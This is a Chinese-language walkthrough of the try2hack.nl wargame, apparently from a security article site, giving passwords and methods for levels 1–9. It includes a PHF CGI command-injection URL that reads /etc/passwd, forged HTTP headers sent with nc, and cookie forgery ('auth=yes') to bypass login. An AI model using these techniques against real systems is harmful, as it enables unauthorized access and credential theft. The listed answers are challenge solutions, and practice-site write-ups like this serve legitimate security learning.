上一篇:google hacking的实现以及应用 >>
最新try2hack全详解
http://www.try2hack.nl/levels/
直接察看源文件即可看到
if (passwd =="h4x0r") {
alert("alright! on to level 2...");
location.href = "level2-xfdgnh.xhtml";
所以密码就是h4x0r,下一关地址
level2-xfdgnh.xhtml
第二关是一个flash验证
可以用flash 反编译工具,
在本地临时文件中找到该网站上的flash
可以找到原代码中有一段:
on (release) {
if ((txtusername == "try2hack") and (txtpassword == "irtehh4x0r!")) {
geturl ("level3-.xhtml", "_self");
}
}
所以username为try2hack, password为irtehh4x0r!
下一关地址level3-.xhtml
该关一进去 便弹出一对话框,输入错误便跳转到其它页面,在其转向的是后立刻按住停止,察看源文件,可以看到其中有
if (pwd==password){
alert("allright!\nentering level 4 ...");
location.href = correctsite;
好像这就是关键,但password,correctsite这几个关键并没有看到被赋值
仔细找便可以发现
在这之前有<script src="javascript">这就是调用了一个文件
那我们就来到http://www.try2hack.nl/levels/javaScript
哈哈
当中就有
password = "try2hackrawks";
correctsite = "level4-kdnvxs.xhtml";
wrongsite = "http://www.disney.com";
第四关,源文件当中有<applet code="passwdlevel4.class"
这是他调用的源文件
http://www.try2hack.nl/levels/passwdlevel4.class
下载下来(打开要用工具),代码中其实是指向level4
打开http://www.try2hack.nl/levels/level4
源文件中有:
level5-fdvbdf.xhtml
appletking
pieceofcake
这就是答案了
http://www.try2hack.nl/levels/level5-fdvbdf.xhtml第五关
让你下载一个vb3编写的程序(运行如果提示找不到什么运行库的,去网上搜索),我先用exescope察看他,当中有http://www.try2hack.nl/levels/level6-ksghvb.xhtmltxtusername=almostahacker txtpassword=zqre01a2d
难道这就是答案,你试一下就发现,这是 表面的,真的答案还得分析原代码,因为是vb3编写的,所以我们可以用工具得到其源代码,但是工具我花了很久才找到的,方便大家我就打包一起了
看这界面,很古老吧
看到了吧
真正起作用的是这些
他现在生成了源文件,我们打开来看看
if edtusername = mid(gc0006, 56, 1) & mid(gc0006, 28, 1) & mid(gc0006, 35, 1) & mid(gc0006, 3, 1) & mid(gc0006, 44, 1) & mid(gc0006, 11, 1) & mid(gc0006, 13, 1) & mid(gc0006, 21, 1) then
if edtpassword = mid(gc0006, 45, 1) & mid(gc0006, 48, 1) & mid(gc0006, 25, 1) & mid(gc0006, 32, 1) & mid(gc0006, 15, 1) & mid(gc0006, 40, 1) & mid(gc0006, 25, 1) & mid(gc0006, 14, 1) & mid(gc0006, 19, 1) then
msgbox "level 6 can be found at: " & left$(gc000a, 37) & mid(gc0006, 21, 1) & mid(gc0006, 14, 1) & mid(gc0006, 29, 1) & mid(gc0006, 32, 1) & mid(gc0006, 12, 1) & mid(gc0006, 14, 1) & mid(gc000a, 44, 6), 0, "horray!"
end
end if
end if
当中还有常量gc0006
global const gc0006 = "0123456789abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz.,:;-*+=~&!_$#@()[]{}<\/>"
global const gc000a = "http://www.try2hack.nl/levels/level6-ksghvb.xhtml"
这些都已定义了,只要编译以下就知道结果了
try2hack
ilovedodi
就是这些了,你可以自己核对,编译出来
得到下一关
第六关
下载一个vb6编写的程序
要是直接破解,记得原来有人发过一个动画的,我就不重复了
我们来分析它发出的数据,可以看到到他访问了www.try2hack.nl/levels/level6.data
我们来看看这是什么
这像是一种加密算法,名字是b*c*n**n
我到处查了资料,找到了实际上,这种算法叫baconion,详细的资料我放在一起方便大家看,
注意这里:
the bacononian cipher:
a aaaaa g aabba n abbaa t baaba
b aaaab h aabbb o abbab u-v baabb
c aaaba i-j abaaa p abbba w babaa
d aaabb k abaab q abbbb x babab
e aabaa l ababa r baaaa y babba
f aabab m ababb s baaab z babbb
这样我们就可以得到
username:dabomb
password:encryptionrawks
得到第七关地址
http://www.try2hack.nl/levels/level7-xfkohc.php
看到提示必须用ie7.66,这还没出呢?
他是怎么知道我浏览器版本的呢?
我们看一下传送的数据
get /levels/level7-xfkohc.php http/1.1
accept: */*
accept-language: zh-cn
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; whcc/0.6; .net clr 1.1.4322)
host: www.try2hack.nl
connection: keep-alive
看到user-agent,这里把信息都告诉了他
那我们来改一下,将msie 6.0改为msie 7.66
传送这些当然用nc啦
nc -vv www.try2hack.nl 80
get /levels/level7-xfkohc.php http/1.1
accept: */*
accept-language: zh-cn
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 7.66; windows nt 5.1; sv1; whcc/0.6; .net clr 1.1.4322)
host: www.try2hack.nl
connection: keep-alive
提示:sorry, but you must use a unix or linux system
那我们再改
nc -vv www.try2hack.nl 80
get /levels/level7-xfkohc.php http/1.1
accept: */*
accept-language: zh-cn
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 7.66; unix; sv1; whcc/0.6; .net clr 1.1.4322)
host: www.try2hack.nl
connection: keep-alive
又提示sorry, but you mustget here from a link on the page:http://www.microsoft.com/ms.htm
一定要从http://www.microsoft.com/ms.htm连接到本页,那再改,添加referer
nc -vv www.try2hack.nl 80
get /levels/level7-xfkohc.php http/1.1
accept: */*
accept-language: zh-cn
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 7.66; unix; sv1; whcc/0.6; .net clr 1.1.4322)
referer:http://www.microsoft.com/ms.htm
host: www.try2hack.nl
connection: keep-alive
如果上述操作嫌麻烦,推荐一个工具:全过程可以如下演示
得到第八关地址:level8-balnrg.xhtml
看到这个了吧 :/cgi-bin/phf
实际上这时一个cgi漏洞的标志
搜索一下就有了(要学会用搜索)
就是这里了:
http://www.try2hack.nl/cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd
得到了这些信息,但是密码是加了密的,我们也有解密的,看如下演示吧
看到了吧
得到rootarse
输入这些
第九关:http://www.try2hack.nl/levels/level9-gnapei.php
还是让你输入信息,可是好像没有什么那样的漏洞了
还是分析传送数据
post /levels/level9-gnapei.php http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
referer: http://www.try2hack.nl/levels/level9-gnapei.php
accept-language: zh-cn
content-type: application/x-www-form-urlencoded
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; whcc/0.6; .net clr 1.1.4322)
host: www.try2hack.nl
content-length: 51
connection: keep-alive
cache-control: no-cache
cookie: str_username=admin=; str_password=yu0aertehbomb=; auth=no=
username=2222222&password=222222222222&submit=enter
值得注意的是这里:
cookie: str_username=admin=; str_password=yu0aertehbomb=; auth=no=
凭着知觉,用户名是admin,密码是yu0aertehbomb
但是输入后出现there is a problem with your authorization. please try again:
一定是他验证了我们的cookie,尤其是auth=no=,很明显是阻碍
我们就还得搞个cookie欺骗了
那我们就构造一下
重点是:
cookie: str_username=admin; str_password=yu0aertehbomb; auth=yes
数据里
username=admin&password=yu0aertehbomb&submit=enter
再提交数据
构造后的数据就是这样:
post /levels/level9-gnapei.php http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
referer: http://www.try2hack.nl/levels/level9-gnapei.php
accept-language: zh-cn
content-type: application/x-www-form-urlencoded
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; whcc/0.6; .net clr 1.1.4322)
host: www.try2hack.nl
content-length: 51
connection: keep-alive
cache-control: no-cache
cookie: str_username=admin; str_password=yu0aertehbomb; auth=yes
username=admin&password=yu0aertehbomb&submit=enter
用上nc
看到了吧:good job! you can find level 10 at our irc channels. go to #try2hack.level10 on
irc.mediamonks.net or irc.deviantart.com and use 'yu0aertehbomb' as key to conti
nue. see the <a href="../chat/">chat</a> page for more information.
这就是让你用irc去irc.mediamonks.net服务器的#try2hack.level10用密码yu0aertehbomb进入,这是一关的话,我还不知道下一关怎么过呢
这是irc连接工具
要等一会
看到了吧
人挺多的
()
下一篇:Win 2000内置安全命令的威力 >>
相关文章:
- · 史上最强破解XP口令方法
- · 利用X-scan实现DDoS Ping攻击
- · 全力打造个人网络安全
- · 浅谈Win2000密码的必然破解
- · Windows 2000局域网的组策略管理
- · 隐藏后门之关闭系统默认共享资源
- · FTP协议的分析和扩展
- · Linux 运行级init详解
- · 用bandwidthd进行网络流量检测和分析
- · 非会员也可以克隆QQ好友
- · 禁用Cookie功能的几种方法
- · 揭秘盗取QQ密码木马
- · 普通8139网卡变成还原卡和网络克隆三合一卡
- · 自动注册Access ODBC
- · 让Windows系统操作更“个性化”
- · WinXP SP2防火墙大揭秘
- · ADSL路由方式的NAT(端口映射)
- · 微软开恩官方补丁一分不花让2000Pro变Server
- · Windows2000XP2003系统万能Ghost全攻略
- · SQL语言入门教程
- · 初探IPv6
- · vBulletin 论坛forumdisplay.php执行任意代码漏洞
- · Serv-U权限提升再提升--记一次虚拟主机入侵
- · 五大绝招轻松搞定系统更新
- · 用15行perl打造win32下的简易后门
- · Win XP中的28个秘密武器
- · 打造一个完美的IE网页木马
- · 详解Windows XP SP2的安全中心
- · win2000罕见实用技巧集
- · 所有的文件格式
- · 克隆帐户之终结篇
- · RIPN组织的注册教程
- · 使用rtsp-proxy突破电影站点的ip限制
- · 执行一个asp文件完成防止Access数据库下载
- · Windows 2000的多语言支持
- · 【超级自动注册申请王】【可自动申请QQ/UC/E话通/PP点点通/浩方/邮箱…等等等!!!】
- · 互联星空VNET和QQ消费综合利用小结
- · IIS攻击与日志